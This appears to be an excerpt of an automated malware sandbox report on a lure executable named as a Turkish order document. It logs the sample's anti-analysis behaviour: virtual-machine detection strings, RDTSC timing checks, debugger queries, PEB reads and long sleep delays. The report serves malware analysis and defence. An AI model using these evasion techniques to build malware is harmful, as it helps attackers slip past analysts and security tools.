Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Ticari Siparis Belgesi 26 07 2024 17545000600.exe PID: 6520, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 2E39904 second address: 2E3990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 2E39B7E second address: 2E39B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Memory allocated: 10A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Memory allocated: 2A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Memory allocated: 4A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Memory allocated: 89B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Memory allocated: 99B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Memory allocated: 9BB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Memory allocated: ABB0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Code function: 6_2_00409AB0 rdtsc

6_2_00409AB0

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8192	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1522	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1594	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 8343	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 888	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 863	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Window / User API: threadDelayed 9843	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_7-13936

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	API coverage: 1.6 %
Source: C:\Windows\SysWOW64\cmd.exe	API coverage: 1.0 %

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe TID: 5340	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7644	Thread sleep count: 1594 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7644	Thread sleep time: -3188000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7644	Thread sleep count: 8343 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7644	Thread sleep time: -16686000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 7580	Thread sleep count: 128 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 7580	Thread sleep time: -256000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 7580	Thread sleep count: 9843 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 7580	Thread sleep time: -19686000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	8_2_007A589A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007B3E66 FindFirstFileW,FindNextFileW,FindClose,	8_2_007B3E66
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	8_2_007A0207
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	8_2_007A4EC1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_0079532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	8_2_0079532E

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000007.00000002.4542934252.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000007.00000000.2144614594.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000007.00000002.4545593539.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094747325.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000007.00000002.4546550713.0000000009C22000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000007.00000000.2144614594.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000007.00000000.2144614594.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000007.00000002.4546607897.0000000009C96000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.4540828283.0000000003554000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000007.00000002.4546607897.0000000009C96000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000007.00000000.2131821278.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 00000007.00000002.4540828283.0000000003554000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000007.00000002.4542934252.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000007.00000002.4545593539.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094747325.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000007.00000002.4540828283.0000000003554000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000007.00000002.4540828283.0000000003554000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 00000007.00000002.4546550713.0000000009C22000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000007.00000000.2131821278.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000007.00000000.2144614594.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.4542934252.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Code function: 6_2_00409AB0 rdtsc

6_2_00409AB0

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Code function: 6_2_0040ACF0 LdrLoadDll,

6_2_0040ACF0

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 8_2_007B2E37 IsDebuggerPresent,

8_2_007B2E37

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01230124 mov eax, dword ptr fs:[00000030h]	6_2_01230124
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AE10E mov eax, dword ptr fs:[00000030h]	6_2_012AE10E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AE10E mov ecx, dword ptr fs:[00000030h]	6_2_012AE10E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AE10E mov eax, dword ptr fs:[00000030h]	6_2_012AE10E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AE10E mov eax, dword ptr fs:[00000030h]	6_2_012AE10E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AE10E mov ecx, dword ptr fs:[00000030h]	6_2_012AE10E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AE10E mov eax, dword ptr fs:[00000030h]	6_2_012AE10E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AE10E mov eax, dword ptr fs:[00000030h]	6_2_012AE10E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AE10E mov ecx, dword ptr fs:[00000030h]	6_2_012AE10E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AE10E mov eax, dword ptr fs:[00000030h]	6_2_012AE10E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AE10E mov ecx, dword ptr fs:[00000030h]	6_2_012AE10E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AA118 mov ecx, dword ptr fs:[00000030h]	6_2_012AA118
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AA118 mov eax, dword ptr fs:[00000030h]	6_2_012AA118
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AA118 mov eax, dword ptr fs:[00000030h]	6_2_012AA118
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012AA118 mov eax, dword ptr fs:[00000030h]	6_2_012AA118
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C0115 mov eax, dword ptr fs:[00000030h]	6_2_012C0115
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FC156 mov eax, dword ptr fs:[00000030h]	6_2_011FC156
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D4164 mov eax, dword ptr fs:[00000030h]	6_2_012D4164
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D4164 mov eax, dword ptr fs:[00000030h]	6_2_012D4164
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01294144 mov eax, dword ptr fs:[00000030h]	6_2_01294144
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01294144 mov eax, dword ptr fs:[00000030h]	6_2_01294144
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01294144 mov ecx, dword ptr fs:[00000030h]	6_2_01294144
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01294144 mov eax, dword ptr fs:[00000030h]	6_2_01294144
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01294144 mov eax, dword ptr fs:[00000030h]	6_2_01294144
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01298158 mov eax, dword ptr fs:[00000030h]	6_2_01298158
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01206154 mov eax, dword ptr fs:[00000030h]	6_2_01206154
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01206154 mov eax, dword ptr fs:[00000030h]	6_2_01206154
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FA197 mov eax, dword ptr fs:[00000030h]	6_2_011FA197
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FA197 mov eax, dword ptr fs:[00000030h]	6_2_011FA197
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FA197 mov eax, dword ptr fs:[00000030h]	6_2_011FA197
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01240185 mov eax, dword ptr fs:[00000030h]	6_2_01240185
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012BC188 mov eax, dword ptr fs:[00000030h]	6_2_012BC188
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012BC188 mov eax, dword ptr fs:[00000030h]	6_2_012BC188
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A4180 mov eax, dword ptr fs:[00000030h]	6_2_012A4180
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A4180 mov eax, dword ptr fs:[00000030h]	6_2_012A4180
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128019F mov eax, dword ptr fs:[00000030h]	6_2_0128019F
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128019F mov eax, dword ptr fs:[00000030h]	6_2_0128019F
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128019F mov eax, dword ptr fs:[00000030h]	6_2_0128019F
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128019F mov eax, dword ptr fs:[00000030h]	6_2_0128019F
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D61E5 mov eax, dword ptr fs:[00000030h]	6_2_012D61E5
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012301F8 mov eax, dword ptr fs:[00000030h]	6_2_012301F8
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C61C3 mov eax, dword ptr fs:[00000030h]	6_2_012C61C3
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C61C3 mov eax, dword ptr fs:[00000030h]	6_2_012C61C3
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127E1D0 mov eax, dword ptr fs:[00000030h]	6_2_0127E1D0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127E1D0 mov eax, dword ptr fs:[00000030h]	6_2_0127E1D0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127E1D0 mov ecx, dword ptr fs:[00000030h]	6_2_0127E1D0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127E1D0 mov eax, dword ptr fs:[00000030h]	6_2_0127E1D0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127E1D0 mov eax, dword ptr fs:[00000030h]	6_2_0127E1D0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01296030 mov eax, dword ptr fs:[00000030h]	6_2_01296030
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01284000 mov ecx, dword ptr fs:[00000030h]	6_2_01284000
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A2000 mov eax, dword ptr fs:[00000030h]	6_2_012A2000
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A2000 mov eax, dword ptr fs:[00000030h]	6_2_012A2000
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A2000 mov eax, dword ptr fs:[00000030h]	6_2_012A2000
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A2000 mov eax, dword ptr fs:[00000030h]	6_2_012A2000
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A2000 mov eax, dword ptr fs:[00000030h]	6_2_012A2000
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A2000 mov eax, dword ptr fs:[00000030h]	6_2_012A2000
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A2000 mov eax, dword ptr fs:[00000030h]	6_2_012A2000
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A2000 mov eax, dword ptr fs:[00000030h]	6_2_012A2000
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121E016 mov eax, dword ptr fs:[00000030h]	6_2_0121E016
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121E016 mov eax, dword ptr fs:[00000030h]	6_2_0121E016
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121E016 mov eax, dword ptr fs:[00000030h]	6_2_0121E016
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121E016 mov eax, dword ptr fs:[00000030h]	6_2_0121E016
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FA020 mov eax, dword ptr fs:[00000030h]	6_2_011FA020
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FC020 mov eax, dword ptr fs:[00000030h]	6_2_011FC020
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122C073 mov eax, dword ptr fs:[00000030h]	6_2_0122C073
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01202050 mov eax, dword ptr fs:[00000030h]	6_2_01202050
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01286050 mov eax, dword ptr fs:[00000030h]	6_2_01286050
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012980A8 mov eax, dword ptr fs:[00000030h]	6_2_012980A8
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C60B8 mov eax, dword ptr fs:[00000030h]	6_2_012C60B8
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C60B8 mov ecx, dword ptr fs:[00000030h]	6_2_012C60B8
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120208A mov eax, dword ptr fs:[00000030h]	6_2_0120208A
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011F80A0 mov eax, dword ptr fs:[00000030h]	6_2_011F80A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012860E0 mov eax, dword ptr fs:[00000030h]	6_2_012860E0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012080E9 mov eax, dword ptr fs:[00000030h]	6_2_012080E9
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012420F0 mov ecx, dword ptr fs:[00000030h]	6_2_012420F0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FC0F0 mov eax, dword ptr fs:[00000030h]	6_2_011FC0F0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012820DE mov eax, dword ptr fs:[00000030h]	6_2_012820DE
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FA0E3 mov ecx, dword ptr fs:[00000030h]	6_2_011FA0E3
